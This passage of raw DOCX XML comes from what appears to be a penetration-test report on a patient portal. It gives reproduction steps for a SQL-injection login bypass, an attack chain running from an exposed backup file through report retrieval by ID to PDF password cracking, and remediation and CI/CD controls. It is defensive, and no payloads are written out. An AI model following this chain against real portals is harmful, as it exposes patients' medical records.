                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Target hostname and authorization boundary are stated at the front of the report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Minimal exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>The SQLi proof changes one field while holding the password constant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Baseline comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Normal invalid login is captured before the exploit request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Impact proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portal access and three PDF responses are preserved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Independent corroboration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Burp/browser evidence supplements curl output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Tool honesty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqlmap limitations are recorded instead of being rewritten as confirmation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Data quantification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exposed database records are counted and aggregated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Evidence integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SHA-256 inventory and organized artifacts are retained</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Remediation verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Every major finding has a concrete retest condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>How a reviewer should reproduce the core finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Request the patient login form and confirm the username/password POST fields.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Send the baseline invalid credentials and record HTTP 200/no redirect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Change only the username to the authorized test payload and repeat the request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Confirm the HTTP 302 Location header points to portal.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Open the redirected portal and verify the report list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Retrieve the three report objects and compare status, size and content type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>For the backup path, request the known SQL filename without authentication and verify the file is returned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>10. Attacker Effort vs Defender Effort</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The observed attack chain has low operational friction. The attacker does not need a custom exploit framework, privileged network access or user interaction. Most steps consist of ordinary HTTP requests followed by offline file analysis. This is an important security property: when exploitation is simple, a vulnerability can be abused at scale even if the underlying code defect is small.</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Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Defender control that should stop it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Web browser/curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Disable directory listing and remove sensitive files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Backup access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Known filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Keep backups outside public web root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP POST request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Parameterized query</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portal access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP redirect/session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Correct authentication invariant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Report retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Known numeric ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Record-level authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Offline CPU time + wordlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Strong document password/modern encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>11. Remediation Engineering — From Patch to Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A professional remediation plan should specify not only what to change but how the change can be verified. The following control sequence turns the findings into an engineering backlog.</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Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Implementation task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Verification artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public-file hygiene</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Move backups/logs/archives outside document root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Web scan + 403/404 evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Directory controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Disable auto-indexing and deny legacy paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unauthenticated directory tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use prepared statements and safe password verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Regression suite + code review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Error handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Disable database exception display</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Malformed-input response captures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Object authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Check session identity against report owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Horizontal authorization test matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Document protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Use strong passwords and current encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>qpdf/security policy check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Correlate failed login → portal session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SIEM rule + sample alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deployment pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Fail builds containing .sql/.bak/log artifacts in web root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI artifact scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>CI/CD prevention ideas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Fail a build if database dumps or backup extensions appear under the web document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
